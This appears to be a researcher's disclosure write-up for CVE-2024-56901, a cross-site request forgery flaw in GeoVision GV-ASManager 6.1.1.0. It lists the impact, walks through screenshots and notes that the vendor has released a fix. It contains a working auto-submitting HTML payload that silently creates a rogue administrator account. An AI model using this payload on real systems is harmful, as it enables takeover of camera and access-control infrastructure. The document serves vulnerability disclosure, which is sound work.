Geovision GV-ASManager 6.1.10 Cross Site Request Forgery

# CVE-2024-56901
    CVE-2024-56901 - A Cross-Site Request Forgery (CSRF) vulnerability in [Geovision GV-ASManager](https://www.geovision.com.tw) web application with the version 6.1.1.0 or less that allows attackers to arbitrarily create Admin accounts via a crafted GET request method. This vulnerability is used in chain with [CVE-2024-56903](https://github.com/DRAGOWN/CVE-2024-56903) for a successful CSRF attack.
    
    <img src="https://github.com/user-attachments/assets/4020556c-fa21-4277-bd0e-209054e020cc" width="800">
    
    # Requirements
    To perform successful attack an attacker requires:
      - GeoVision ASManager version 6.1.1.0 or less
      - Network access to the GV-ASManager web application (there are cases when there are public access)
      - Administrator's interaction with an open session in the browser
    
    # Impact
    The vulnerability can be leveraged to **perform the following unauthorized actions**:
    + A unauthorized account is able to:
      - Modify POST method request with GET by leveraging [CVE-2024-56903](https://github.com/DRAGOWN/CVE-2024-56903) vulnerability.
      - Craft a malicious HTML page which makes changes in the application on behalf of the administrator account.
      - Create a new administrator account on behalf of the legit administrator account.
    + After the successful attack, **an attacker will be able to**:
      - Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
      - Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
      - Disrupt and disconnect services such as monitoring cameras, access controls.
      - Clone and duplicate access control data for further attack scenarios.
      - Perform [CVE-2024-56902](https://github.com/DRAGOWN/CVE-2024-56902) attack to retrieve cleartext password that can be reused in other digital assets of the organization.
    
    # CVE-2024-56901 PoC [Testing GeoVision v6.1.1.0]
    ### Operators:
    
    <img src="https://github.com/user-attachments/assets/04502d72-962b-4bde-bbec-94107fdc20b3" width="700">
    
    > Accounts list before we start attack
    
    <img src="https://github.com/user-attachments/assets/5fc20cfa-ce68-46fb-a2a8-8118d2b92506" width="700">
    
    > By default the creation of a new accoun is done with POST request, we need to change the request method with GET
    
    <img src="https://github.com/user-attachments/assets/2bcbdf13-8dfe-4b6a-aa58-aaddce68cec1" width="700">
    
    > Changing the POST request method with GET
    
    <img src="https://github.com/user-attachments/assets/65e2ab6e-3b2f-454b-9a26-f0391c5ec2af" width="700">
    
    > Generation of the CSRF attack code to create a new administrator - Malicious
    
    <img src="https://github.com/user-attachments/assets/a0081072-46c8-45c8-9686-f5b980a95902" width="700">
    
    > Crafting HTML page, which, if triggered by administrator with open session, will create a new administrator account - Malicious
    
    ```
    <html>
      <body>
        <form action="https://192.168.50.129/ASWeb/bin/ASWebCommon.srf">
          <input type="hidden" name="action" value="UA&#95;SetCreateAccount" />
          <input type="hidden" name="id" value="Malicious" />
          <input type="hidden" name="password" value="Youarecracked999&#33;" />
          <input type="hidden" name="email" value="Malicious&#64;geovision&#46;com&#46;tw" />
          <input type="hidden" name="level" value="2" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    
    ```
    
    <img src="https://github.com/user-attachments/assets/ee5de623-1bf9-4aa6-aaf0-3cd52a285cea" width="700">
    
    > While the administrator is logged in the web application, he, by triggering the CSRF code, automatically creates the new Malicious administrator.
    
    <img src="https://github.com/user-attachments/assets/bd6e8427-a52c-4c07-8f82-a6d3114ecd8d" width="700">
    
    > The Malicious administrator account has been created.
    
    <img src="https://github.com/user-attachments/assets/54d74a77-adb0-4bc8-8e2b-3992fb563eeb" width="700">
    
    > The Malicious administrator account logs in with full of privileges.
    
    It is worth noting that, by this attack, Malicious user gains administrative privileges in the following applications:
    ```
    ASWeb	- Access & Security Management 
    TAWeb	- Time and Attendance Management 
    VMWeb	- Visitor Management 
    ASManager - Access & Security Management software in OS
    ```
    
    ### The vendor of the product **GeoVision** is informed and they already released the newest fixed version 6.1.2.0 (as of January 2025)
    
    <img src="https://github.com/user-attachments/assets/1c97dfe1-611c-4b0f-871d-a536fdf24658" width="700">
    
    <img src="https://github.com/user-attachments/assets/1cf156dd-6c06-4a29-814d-4424b131a3a6" width="700">
    
    Download the latest version from [here](https://www.geovision.com.tw/download/product/)
    
    ## Contact
    If you have a question, you can contact me, Giorgi Dograshvili on [LinkedIn](https://ge.linkedin.com/in/giorgi-dograshvili).